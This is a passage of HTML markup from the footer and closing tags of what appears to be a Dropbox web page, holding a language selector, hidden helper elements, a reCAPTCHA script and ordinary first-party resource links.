                                                                                    <div class="react-locale-selector-wrapper"><div id="component4931208979438053683">
                                                                                        <div id="locale-container"><span id="locale-link"><button class="button-as-link react-locale-selector-link" title="Choose a language">
                                                                                            <img class="sprite sprite_web s_web_globe_gray_20x20" src="https://cfl.dropboxstatic.com/static/images/icons/icon_spacer-vflN3BYt2.gif" alt="">
                                                                                            <span data-locale="en">English (United States)</span>
                                                                                            <img class="sprite sprite_web s_web_arrow-up-gray arrow" src="https://cfl.dropboxstatic.com/static/images/icons/icon_spacer-vflN3BYt2.gif" alt=""></button>
                                                                                            </span></div></div></div><div class="clear"></div></div></footer><noscript><p class="center">The Dropbox website requires JavaScript.</p></noscript></div>
                                                                                            <div id="ieconsole" style="position: absolute; top: 0; left: 0; font-family: Courier"></div>
                                                                                            <div id="FB_HiddenContainer" style="position:absolute; top:-10000px;width:0px; height:0px; left: 0;"></div> 
                            <img alt="" src="https://dropbox.com/hstsping" style="display:none;">
                    <div aria-live="assertive" class="ax-visually-hidden" id="accessible-announce">
    
                    </div><iframe style="display: none;" src="https://marketing.dropbox.com/login?referrer=" sandbox="allow-scripts allow-same-origin" hidden=""></iframe>
                    <script src="https://www.google.com/recaptcha/api.js?hl=en&amp;onload=recaptchaOnloadCallback&amp;render=explicit" nonce=""></script></body>
                    
                    </html>